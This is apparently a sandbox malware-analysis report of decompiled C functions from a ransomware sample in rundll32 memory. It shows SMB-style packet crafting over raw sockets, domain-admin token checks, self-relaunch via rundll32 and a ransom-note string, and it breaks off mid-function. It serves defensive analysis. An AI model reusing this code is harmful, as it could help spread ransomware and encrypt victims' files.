Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: File$BuffersCloseCombineCountCreateFlushFreeHandleLocalMultipleObjectsPathTickWaitWritememsetwsprintf
String ID: Oops! Your files have been encrypted.If you see this text, your files are no longer accessible.You might have been looking f$Readme.txt$pGdv0Hcv
API String ID: 1343258794-42126597
Opcode ID: 9d2f2e58ef5b15177b1790d098a4dc352072ec4752819cf950c15faadf309e4b
Instruction ID: ad3d7efe17dae23cc0b698dbe863c6aad386bf08122ff7ff6f9846e4b1d0b7b6
Opcode Fuzzy Hash: 9d2f2e58ef5b15177b1790d098a4dc352072ec4752819cf950c15faadf309e4b
Instruction Fuzzy Hash: 873161B6900248AFDB219B64DD49FDB7BFCFB49700B048565FA06D2150EB3DEA44CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 007B2F5A Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 98
memorynetworkCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E007B2F5A(intOrPtr _a4, void* _a8, short _a12, intOrPtr _a16, intOrPtr _a20, short _a24, void* _a28, signed int _a32) {
				char _v5;
				int _v12;
				void* _v16;
				void* _t36;
				signed int _t38;
				short _t45;
				signed short _t50;
				void* _t53;
				void* _t57;
				signed int _t59;
				short _t61;
				void* _t70;
				void* _t71;

				_v5 = 0;
				_t36 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
				_v16 = _t36;
				if(_t36 != 0) {
					_t38 = _a32 & 0x0000ffff;
					_v12 = _t38;
					_t57 = HeapAlloc(GetProcessHeap(), 8, _t38 + 0x40);
					if(_t57 != 0) {
						_t59 = 9;
						memcpy(_t57, _a8, _t59 << 2);
						_t70 = _v12 + 0x40;
						_t45 = _t70 - 4;
						__imp__#9(_t45);
						 *((short*)(_t57 + 2)) = _t45;
						 *((short*)(_t57 + 0x29)) = _a12;
						 *((intOrPtr*)(_t57 + 0x2b)) = _a16;
						 *((intOrPtr*)(_t57 + 0x2f)) = _a20;
						 *((short*)(_t57 + 0x33)) = _a24;
						_t50 = _a32;
						_t61 = 0x3c;
						 *(_t57 + 0x35) = _t50;
						 *(_t57 + 0x39) = _t50;
						 *((short*)(_t57 + 0x3d)) = _t50 + 1;
						_t24 = _t57 + 0x40; // 0x40
						 *((char*)(_t57 + 8)) = 0x2f;
						 *((short*)(_t57 + 0x24)) = 0xff0c;
						 *((short*)(_t57 + 0x3b)) = _t61;
						_t53 = memcpy(_t24, _a28, _v12);
						__imp__#19(_a4, _t57, _t70, 0);
						if(_t53 > 0) {
							_t71 = _v16;
							__imp__#16(_a4, _t71, 0xffff, 0);
							if(_t53 > 0 &&  *((intOrPtr*)(_t71 + 9)) == 0) {
								_v5 = 1;
							}
						}
						HeapFree(GetProcessHeap(), 8, _t57);
					}
					HeapFree(GetProcessHeap(), 8, _v16);
				}
				return _v5;
			}

0x007b2f6f
0x007b2f7c
0x007b2f7e
0x007b2f83
0x007b2f89
0x007b2f8e
0x007b2f9c
0x007b2fa0
0x007b2fab
0x007b2fae
0x007b2fb3
0x007b2fb6
0x007b2fba
0x007b2fc0
0x007b2fc8
0x007b2fcf
0x007b2fd5
0x007b2fde
0x007b2fe2
0x007b2fe5
0x007b2fe9
0x007b2ff0
0x007b2ff5
0x007b2ff9
0x007b2ffd
0x007b3001
0x007b3007
0x007b300b
0x007b301b
0x007b3023
0x007b3025
0x007b3032
0x007b303a
0x007b3041
0x007b3041
0x007b303a
0x007b304f
0x007b304f
0x007b3061
0x007b3067
0x007b306e

APIs

GetProcessHeap.KERNEL32(00000008,0000FFFF,00000001,00000200,?,?,?,?,?,?,?,?), ref: 007B2F73
HeapAlloc.KERNEL32(00000000), ref: 007B2F7C
GetProcessHeap.KERNEL32(00000008,?,7777C2E0), ref: 007B2F97
HeapAlloc.KERNEL32(00000000), ref: 007B2F9A
htons.WS2_32(424D53FE), ref: 007B2FBA
memcpy.MSVCRT ref: 007B300B
send.WS2_32(?,00000000,?,00000000), ref: 007B301B
recv.WS2_32(?,?,0000FFFF,00000000), ref: 007B3032
GetProcessHeap.KERNEL32(00000008,00000000), ref: 007B3048
HeapFree.KERNEL32(00000000), ref: 007B304F
GetProcessHeap.KERNEL32(00000008,?), ref: 007B305A
HeapFree.KERNEL32(00000000), ref: 007B3061

Strings

Oet Uet0Xet, xrefs: 007B2F62, 007B3048, 007B305A

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$Process$AllocFree$htonsmemcpyrecvsend
String ID: Oet Uet0Xet
API String ID: 2433318192-3175316637
Opcode ID: 890ef2d5331946cf658f990e17d3d068942e9f67b9cfe83f45f19e0ae77c8644
Instruction ID: a4ed22a9a794b7fc7eb5717ce27a62e1f49348ee3ff002ec098a50b8b8e177f5
Opcode Fuzzy Hash: 890ef2d5331946cf658f990e17d3d068942e9f67b9cfe83f45f19e0ae77c8644
Instruction Fuzzy Hash: 31318D75900245AADF10AFA5DC89F9A7BB9FF48300F058065F908EB251E679D944CB29

Uniqueness

Uniqueness Score: -1.00%

Function 007B32AF Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 88
memorynetworkCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E007B32AF(intOrPtr _a4, void* _a8, short _a12, void* _a16, void* _a20, signed short _a24) {
				signed short _v8;
				void* _v12;
				intOrPtr _v16;
				void* _t27;
				long _t30;
				void* _t37;
				int _t40;
				signed int _t43;
				void* _t48;
				signed int _t50;
				void* _t64;

				_v16 = 0xbadf00d;
				_t27 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
				_v12 = _t27;
				if(_t27 != 0) {
					_t30 = (_a24 & 0x0000ffff) + 0x4d;
					_v8 = _t30;
					_t48 = HeapAlloc(GetProcessHeap(), 8, _t30);
					if(_t48 != 0) {
						_t50 = 9;
						_t37 = memcpy(_t48, _a8, _t50 << 2);
						__imp__#9(_v8 + 0xfffffffc);
						 *(_t48 + 2) = _t37;
						 *((short*)(_t48 + 0x22)) = _a12;
						 *((char*)(_t48 + 8)) = 0xa0;
						_t14 = _t48 + 0x24; // 0x24
						_t40 = memcpy(_t14, _a16, 0 << 2);
						_t17 = _t48 + 0x4d; // 0x4d
						asm("movsb");
						memcpy(_t17, _a20, _t40);
						_t43 = _v8 & 0x0000ffff;
						__imp__#19(_a4, _t48, _t43, 0, 0xa);
						if(_t43 > 0) {
							_t64 = _v12;
							__imp__#16(_a4, _t64, 0xffff, 0);
							if(_t43 > 0) {
								_v16 =  *((intOrPtr*)(_t64 + 9));
							}
						}
						HeapFree(GetProcessHeap(), 8, _t48);
					}
					HeapFree(GetProcessHeap(), 8, _v12);
				}
				return _v16;
			}

0x007b32c4
0x007b32d4
0x007b32d6
0x007b32db
0x007b32e6
0x007b32ec
0x007b32f4
0x007b32f8
0x007b3306
0x007b330d
0x007b330f
0x007b3318
0x007b3322
0x007b332b
0x007b332f
0x007b3332
0x007b3338
0x007b333c
0x007b333d
0x007b3342
0x007b3350
0x007b3358
0x007b335a
0x007b3368
0x007b3370
0x007b3375
0x007b3375
0x007b3370
0x007b3382
0x007b3382
0x007b3394
0x007b339a
0x007b33a1

APIs

GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,?), ref: 007B32CB
HeapAlloc.KERNEL32(00000000), ref: 007B32D4
GetProcessHeap.KERNEL32(00000008,?,74654F20), ref: 007B32EF
HeapAlloc.KERNEL32(00000000), ref: 007B32F2
htons.WS2_32(?), ref: 007B330F
memcpy.MSVCRT ref: 007B333D
send.WS2_32(?,00000000,?,00000000), ref: 007B3350
recv.WS2_32(?,?,0000FFFF,00000000), ref: 007B3368
GetProcessHeap.KERNEL32(00000008,00000000), ref: 007B337B
HeapFree.KERNEL32(00000000), ref: 007B3382
GetProcessHeap.KERNEL32(00000008,?), ref: 007B338D
HeapFree.KERNEL32(00000000), ref: 007B3394

Strings

Oet Uet0Xet, xrefs: 007B337B, 007B338D

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$Process$AllocFree$htonsmemcpyrecvsend
String ID: Oet Uet0Xet
API String ID: 2433318192-3175316637
Opcode ID: 465410287aafcbf70b987896cd4d2e42c441c5ad7692400b7621cb06480d8e0a
Instruction ID: d2510958b4b44006de669d53af547e9b98c71ee85221e64b28af33cdb3460140
Opcode Fuzzy Hash: 465410287aafcbf70b987896cd4d2e42c441c5ad7692400b7621cb06480d8e0a
Instruction Fuzzy Hash: 15316B7190020AEBDB109FA59C4AFAF7BA8FF49310F048165F900EB291EB78DD05CB64

Uniqueness

Uniqueness Score: -1.00%

Function 007B2E12 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 109
memorynetworkCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E007B2E12(intOrPtr _a4, signed int _a8, short _a12) {
				char _v5;
				intOrPtr _v12;
				void* _v16;
				void* _t43;
				void* _t49;
				short _t52;
				short _t53;
				short _t54;
				short _t55;
				short _t60;
				void* _t65;
				signed int _t67;
				void* _t75;
				signed int _t78;

				_v5 = 0;
				_v12 = 0xbadf00d;
				_t43 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
				_v16 = _t43;
				if(_t43 == 0) {
					L14:
					return _v5;
				}
				_t65 = HeapAlloc(GetProcessHeap(), 8, 0x48);
				if(_t65 == 0) {
					L13:
					HeapFree(GetProcessHeap(), 8, _v16);
					goto L14;
				}
				_t67 = 9;
				_t49 = memcpy(_t65, _a8, _t67 << 2);
				__imp__#9(0x44);
				 *(_t65 + 0x31) =  *(_t65 + 0x31) | 0xffffffff;
				 *(_t65 + 2) = _t49;
				_t78 = _a8;
				 *((short*)(_t65 + 0x25)) = 0xfc;
				 *((short*)(_t65 + 0x27)) = 0xec0;
				_t52 = 0x40;
				 *((short*)(_t65 + 0x29)) = _t52;
				_t53 = 4;
				 *((short*)(_t65 + 0x37)) = _t53;
				_t54 = 0x40;
				 *((short*)(_t65 + 0x39)) = _t54;
				_t55 = 5;
				 *((short*)(_t65 + 0x41)) = _t55;
				 *((char*)(_t65 + 8)) = 0x25;
				 *((char*)(_t65 + 0x24)) = 0xe;
				 *((short*)(_t65 + 0x44)) = _a12;
				_a8 = _a8 & 0x00000000;
				 *(_t78 + 0x22) = ( *(_t78 + 0x22) & 0x0000ff00) - 0x100;
				L3:
				L3:
				if(_a8 != 8) {
					 *(_t78 + 0x22) =  *(_t78 + 0x22) + 1;
					_t60 =  *(_t78 + 0x22);
				} else {
					_t60 = _a12;
				}
				 *((short*)(_t65 + 0x22)) = _t60;
				__imp__#19(_a4, _t65, 0x48, 0);
				if(_t60 > 0) {
					_t75 = _v16;
					__imp__#16(_a4, _t75, 0xffff, 0);
					if(_t60 > 0) {
						_v12 =  *((intOrPtr*)(_t75 + 9));
					}
				}
				if(_v12 != 0) {
					goto L12;
				}
				_a8 = _a8 + 1;
				if(_a8 < 0xc) {
					goto L3;
				}
				_v5 = 1;
				L12:
				HeapFree(GetProcessHeap(), 8, _t65);
				goto L13;
			}

0x007b2e27
0x007b2e2b
0x007b2e3b
0x007b2e3d
0x007b2e42
0x007b2f51
0x007b2f57
0x007b2f57
0x007b2e52
0x007b2e56
0x007b2f3e
0x007b2f4a
0x00000000
0x007b2f50
0x007b2e61
0x007b2e66
0x007b2e68
0x007b2e6e
0x007b2e72
0x007b2e76
0x007b2e80
0x007b2e89
0x007b2e8d
0x007b2e8e
0x007b2e94
0x007b2e95
0x007b2e9b
0x007b2e9c
0x007b2ea2
0x007b2ea3
0x007b2eab
0x007b2eaf
0x007b2eb3
0x007b2ecb
0x007b2ecf
0x00000000
0x007b2ed3
0x007b2ed7
0x007b2edf
0x007b2ee3
0x007b2ed9
0x007b2ed9
0x007b2ed9
0x007b2eef
0x007b2ef3
0x007b2efb
0x007b2efd
0x007b2f0b
0x007b2f13
0x007b2f18
0x007b2f18
0x007b2f13
0x007b2f1f
0x00000000
0x00000000
0x007b2f21
0x007b2f28
0x00000000
0x00000000
0x007b2f2a
0x007b2f2e
0x007b2f38
0x00000000

APIs

GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?), ref: 007B2E32
HeapAlloc.KERNEL32(00000000), ref: 007B2E3B
GetProcessHeap.KERNEL32(00000008,00000048,74654F20), ref: 007B2E4D
HeapAlloc.KERNEL32(00000000), ref: 007B2E50
htons.WS2_32(00000044), ref: 007B2E68
send.WS2_32(0BADF00D,00000000,00000048,00000000), ref: 007B2EF3
recv.WS2_32(0BADF00D,00000008,0000FFFF,00000000), ref: 007B2F0B
GetProcessHeap.KERNEL32(00000008,00000000), ref: 007B2F31
HeapFree.KERNEL32(00000000), ref: 007B2F38
GetProcessHeap.KERNEL32(00000008,?), ref: 007B2F43
HeapFree.KERNEL32(00000000), ref: 007B2F4A

Strings

Oet Uet0Xet, xrefs: 007B2E1A, 007B2F31, 007B2F43

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$Process$AllocFree$htonsrecvsend
String ID: Oet Uet0Xet
API String ID: 1780562090-3175316637
Opcode ID: 71b39c4cc206695e8332b02a4770fd43081dc6c949f2e19f94234d2baafa6054
Instruction ID: 3b5cafdab0210db20c3a2bc0593adff6c0d66d7c2da9aedbb2cb3b4ac1307166
Opcode Fuzzy Hash: 71b39c4cc206695e8332b02a4770fd43081dc6c949f2e19f94234d2baafa6054
Instruction Fuzzy Hash: 6A41A075640349EADB209FA4DC89BAA7BB4FF48710F108559FA09DF292E778C845CB18

Uniqueness

Uniqueness Score: -1.00%

Function 007B892A Relevance: 19.6, APIs: 13, Instructions: 91
threadmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007B892A() {
				long _v8;
				void* _v12;
				void* _v16;
				char* _t31;
				DWORD* _t32;
				long _t33;
				void* _t37;
				void* _t39;
				void** _t43;

				_v16 = 0;
				_v12 = 0;
				if(OpenThreadToken(GetCurrentThread(), 0x20008, 1,  &_v12) == 0) {
					GetLastError();
					L23:
					return _v16;
				}
				_v8 = 0;
				if(GetTokenInformation(_v12, 2, 0, 0,  &_v8) != 0) {
					L21:
					CloseHandle(_v12);
					goto L23;
				}
				if(GetLastError() != 0x7a) {
					L20:
					goto L21;
				}
				_t39 = GlobalAlloc(0x40, _v8);
				if(_t39 == 0) {
					GetLastError();
					L19:
					goto L20;
				}
				if(GetTokenInformation(_v12, 2, _t39, _v8,  &_v8) == 0) {
					GetLastError();
					L17:
					GlobalFree(_t39);
					goto L19;
				}
				_t37 = 0;
				if( *_t39 > 0) {
					_t11 = _t39 + 4; // 0x4
					_t43 = _t11;
					while(_v16 == 0) {
						_t31 = GetSidSubAuthorityCount( *_t43);
						if(_t31 != 0 &&  *_t31 >= 4) {
							_t32 = GetSidSubAuthority( *_t43, 4);
							if(_t32 != 0) {
								_t33 =  *_t32;
								if(_t33 == 0x200 || _t33 == 0x207) {
									_v16 = 1;
								}
							}
						}
						_t37 = _t37 + 1;
						_t43 =  &(_t43[2]);
						if(_t37 <  *_t39) {
							continue;
						} else {
							goto L17;
						}
					}
				}
			}

0x007b893e
0x007b8941
0x007b8953
0x007b8a17
0x007b8a1d
0x007b8a22
0x007b8a22
0x007b8964
0x007b8971
0x007b8a0c
0x007b8a0f
0x00000000
0x007b8a0f
0x007b8983
0x007b8a0b
0x00000000
0x007b8a0b
0x007b8995
0x007b8999
0x007b8a08
0x007b8a0a
0x00000000
0x007b8a0a
0x007b89ac
0x007b89fd
0x007b89ff
0x007b8a00
0x00000000
0x007b8a00
0x007b89ae
0x007b89b2
0x007b89b4
0x007b89b4
0x007b89b7
0x007b89bf
0x007b89c7
0x007b89d2
0x007b89da
0x007b89dc
0x007b89e3
0x007b89ec
0x007b89ec
0x007b89e3
0x007b89da
0x007b89f3
0x007b89f4
0x007b89f9
0x00000000
0x007b89fb
0x00000000
0x007b89fb
0x007b89f9
0x007b89b7

APIs

GetCurrentThread.KERNEL32 ref: 007B8944
OpenThreadToken.ADVAPI32(00000000), ref: 007B894B
GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 007B896D
GetLastError.KERNEL32 ref: 007B897E
GlobalAlloc.KERNEL32(00000040,?), ref: 007B898F
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 007B89A8
GetSidSubAuthorityCount.ADVAPI32(00000004), ref: 007B89BF
GetSidSubAuthority.ADVAPI32(00000004,00000004), ref: 007B89D2
GetLastError.KERNEL32 ref: 007B89FD
GlobalFree.KERNEL32 ref: 007B8A00
GetLastError.KERNEL32 ref: 007B8A08
CloseHandle.KERNEL32(?), ref: 007B8A0F
GetLastError.KERNEL32 ref: 007B8A17

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: ErrorLast$Token$AuthorityGlobalInformationThread$AllocCloseCountCurrentFreeHandleOpen
String ID:
API String ID: 1283781744-0
Opcode ID: 3d003b0c232affa1dc696a149f2f1cd8680dc37fead985f80c56718d8c685b5a
Instruction ID: 59d5e30bea6bc62fe5ccbd584860bb30e6511b167f7f7d829dd3451bfa3081b2
Opcode Fuzzy Hash: 3d003b0c232affa1dc696a149f2f1cd8680dc37fead985f80c56718d8c685b5a
Instruction Fuzzy Hash: 04314C35900219EBDF609BA4DD88FED7B7CEF04750F108265E501A2150EB79AE41DB6A

Uniqueness

Uniqueness Score: -1.00%

Function 007B40E3 Relevance: 18.1, APIs: 10, Strings: 2, Instructions: 91
memorysleepCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E007B40E3(intOrPtr* __ebx, void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, char _a24) {
				char _v5;
				void* _v12;
				void* _t43;
				signed int _t50;
				intOrPtr* _t54;
				void* _t63;

				_t54 = __ebx;
				_push(__ecx);
				_push(__ecx);
				_v5 = 0;
				_t63 = HeapAlloc(GetProcessHeap(), 8, 0x27);
				if(_t63 != 0) {
					 *_t63 = 0x12;
					 *((intOrPtr*)(_t63 + 0x1c)) = 0x48;
					if(1 !=  *__ebx) {
						 *(_t63 + 8) = 8;
					} else {
						 *(_t63 + 8) = 4;
					}
					 *(_t63 + 0x18) =  *(_t63 + 8);
					 *(_t63 + 0x20) =  *(_t54 + 0x54) & 0x000000ff;
					 *(_t63 + 0x25) =  *(_t63 + 0x18) + 1;
					_t43 = HeapAlloc(GetProcessHeap(), 8, 9);
					_v12 = _t43;
					if(_t43 != 0) {
						 *((intOrPtr*)(_t43 + 1)) = _a12;
						 *((intOrPtr*)(_t43 + 5)) = _a16;
						_t58 =  *(_t63 + 0x25) & 0x0000ffff;
						if(E007B3209( *(_t63 + 0x25) & 0x0000ffff, _a4, _a8,  *(_t54 + 0x30) & 0x0000ffff, _t63, _t43,  *(_t63 + 0x25) & 0x0000ffff) != 0) {
							Sleep(0x7d0);
							_t20 =  &_a24; // 0x7b423d
							_t50 =  *_t20 & 0x0000ffff;
							 *(_t63 + 0x20) =  *(_t63 + 0x20) & 0x00000000;
							 *(_t63 + 8) = _t50;
							 *(_t63 + 0x18) = _t50;
							_t51 = _t50 + 1;
							 *(_t63 + 0x25) = _t50 + 1;
							if(E007B3209(_t58, _a4, _a8,  *(_t54 + 0x32) & 0x0000ffff, _t63, _a20, _t51) != 0) {
								Sleep(0x7d0);
								_v5 = 1;
							}
						}
						HeapFree(GetProcessHeap(), 8, _v12);
					}
					HeapFree(GetProcessHeap(), 8, _t63);
				}
				return _v5;
			}

0x007b40e3
0x007b40e6
0x007b40e7
0x007b40f4
0x007b4101
0x007b4105
0x007b410e
0x007b4111
0x007b411b
0x007b4126
0x007b411d
0x007b411d
0x007b411d
0x007b4130
0x007b4137
0x007b4144
0x007b414b
0x007b4151
0x007b4156
0x007b415b
0x007b4161
0x007b4164
0x007b417d
0x007b4184
0x007b418a
0x007b418a
0x007b418e
0x007b4192
0x007b4195
0x007b4198
0x007b419a
0x007b41b5
0x007b41bc
0x007b41c2
0x007b41c2
0x007b41b5
0x007b41ce
0x007b41ce
0x007b41da
0x007b41da
0x007b41e6

APIs

GetProcessHeap.KERNEL32(00000008,00000027,?,00000000,?,?,?,007B423D,?,?,?,?,00000000,00000002), ref: 007B40F8
HeapAlloc.KERNEL32(00000000,?,?,?,007B423D,?,?,?,?,00000000,00000002), ref: 007B40FB
GetProcessHeap.KERNEL32(00000008,00000009,?,?,?,007B423D,?,?,?,?,00000000,00000002), ref: 007B4148
HeapAlloc.KERNEL32(00000000,?,?,?,007B423D,?,?,?,?,00000000,00000002), ref: 007B414B
Sleep.KERNEL32(000007D0,00000000,?,?,00000000,00000000,?,?,?,?,007B423D,?,?,?,?,00000000), ref: 007B4184
Sleep.KERNEL32(000007D0,00000000,?,?,00000000,?,=B{,?,?,?,007B423D,?,?,?,?,00000000), ref: 007B41BC
GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,00000000,00000000,?,?,?,?,007B423D,?,?,?,?), ref: 007B41CB
HeapFree.KERNEL32(00000000,?,?,?,007B423D,?,?,?,?,00000000,00000002), ref: 007B41CE
GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,007B423D,?,?,?,?,00000000,00000002), ref: 007B41D7
HeapFree.KERNEL32(00000000,?,?,?,007B423D,?,?,?,?,00000000,00000002), ref: 007B41DA

Strings

Uet0Xet, xrefs: 007B41CE, 007B41DA
=B{, xrefs: 007B418A, 007B419E

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$Process$AllocFreeSleep
String ID: Uet0Xet$=B{
API String ID: 1437939644-929814222
Opcode ID: c85960aa95d85c9dd621b7c70744122817f4120dc08c21d3c7e545dfcc36d902
Instruction ID: d78c56d14749094cc8735dbafbbdeff0adc0ffc0c856f737c79f86aadca670c7
Opcode Fuzzy Hash: c85960aa95d85c9dd621b7c70744122817f4120dc08c21d3c7e545dfcc36d902
Instruction Fuzzy Hash: 09316174800349AADB309F65CC09FAB7FF8FF49301F008549F9899A291E779D985DB64

Uniqueness

Uniqueness Score: -1.00%

Function 007B7BF7 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 69
processstringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007B7BF7(intOrPtr _a12) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v88;
				short _v1648;
				short _v3208;
				int _t14;
				char* _t20;
				char* _t21;
				void* _t27;
				long _t28;
				long _t29;

				_t14 = GetSystemDirectoryW( &_v1648, 0x30c);
				if(_t14 != 0) {
					_t14 = lstrcatW( &_v1648, L"\\rundll32.exe");
					if(_t14 != 0) {
						_t14 = GetModuleFileNameW( *0x7c7b98, 0x7c7bc8, 0x30c);
						if(_t14 != 0) {
							wsprintfW( &_v3208, L"%ws C:\\Windows\\%ws,#1 %ws",  &_v1648, PathFindFileNameW(0x7c7bc8), _a12);
							_t27 = 0x10;
							_t20 =  &_v20;
							do {
								 *_t20 = 0;
								_t20 = _t20 + 1;
								_t27 = _t27 - 1;
							} while (_t27 != 0);
							_t29 = 0x44;
							_t28 = _t29;
							_t21 =  &_v88;
							do {
								 *_t21 = 0;
								_t21 = _t21 + 1;
								_t28 = _t28 - 1;
							} while (_t28 != 0);
							_v88.cb = _t29;
							_t14 = CreateProcessW( &_v1648,  &_v3208, 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20);
							ExitProcess(0);
						}
					}
				}
				return _t14;
			}

0x007b7c0e
0x007b7c16
0x007b7c28
0x007b7c30
0x007b7c43
0x007b7c4b
0x007b7c6b
0x007b7c76
0x007b7c77
0x007b7c7c
0x007b7c7c
0x007b7c7e
0x007b7c7f
0x007b7c7f
0x007b7c84
0x007b7c85
0x007b7c87
0x007b7c8a
0x007b7c8a
0x007b7c8c
0x007b7c8d
0x007b7c8d
0x007b7cb0
0x007b7cb3
0x007b7cba
0x007b7cba
0x007b7c4b
0x007b7c30
0x007b7cc2

APIs

GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 007B7C0E
lstrcatW.KERNEL32(?,\rundll32.exe), ref: 007B7C28
GetModuleFileNameW.KERNEL32(007C7BC8,0000030C), ref: 007B7C43
PathFindFileNameW.SHLWAPI(007C7BC8,?), ref: 007B7C51
wsprintfW.USER32 ref: 007B7C6B
CreateProcessW.KERNEL32 ref: 007B7CB3
ExitProcess.KERNEL32 ref: 007B7CBA

Strings

%ws C:\Windows\%ws,#1 %ws, xrefs: 007B7C65
\rundll32.exe, xrefs: 007B7C1C

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: FileNameProcess$CreateDirectoryExitFindModulePathSystemlstrcatwsprintf
String ID: %ws C:\Windows\%ws,#1 %ws$\rundll32.exe
API String ID: 3592876439-3730106045
Opcode ID: f477df7cb6aaad50a51f007a6eee45ba78045974c9c3ef8a091c13a52f550fe3
Instruction ID: d4cca5b8af403517543f2e4c1be49f33eebcee62687e0647a99199e5fb25e105
Opcode Fuzzy Hash: f477df7cb6aaad50a51f007a6eee45ba78045974c9c3ef8a091c13a52f550fe3
Instruction Fuzzy Hash: 931145B250011DAFDB259BA5CD48FEB7BBCAF45301F04826AF505E2151EA389E44CB74

Uniqueness

Uniqueness Score: -1.00%

Function 007B8832 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 62
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007B8832() {
				long _v8;
				void* _v12;
				long _v16;
				void* _t10;
				void* _t21;
				long _t25;

				_v16 = 0;
				_t10 = CreateFileW(0x7c7bc8, 0x80000000, 1, 0, 3, 0, 0);
				_v12 = _t10;
				if(_t10 != 0xffffffff) {
					_t25 = GetFileSize(_t10, 0);
					if(_t25 != 0) {
						_t21 = HeapAlloc(GetProcessHeap(), 0, _t25);
						if(_t21 != 0) {
							_v8 = 0;
							if(ReadFile(_v12, _t21, _t25,  &_v8, 0) != 0 || _v8 != _t25) {
								 *0x7c3984 = _t21;
								 *0x7c7b94 = _t25;
								_v16 = 1;
							} else {
								HeapFree(GetProcessHeap(), 0, _t21);
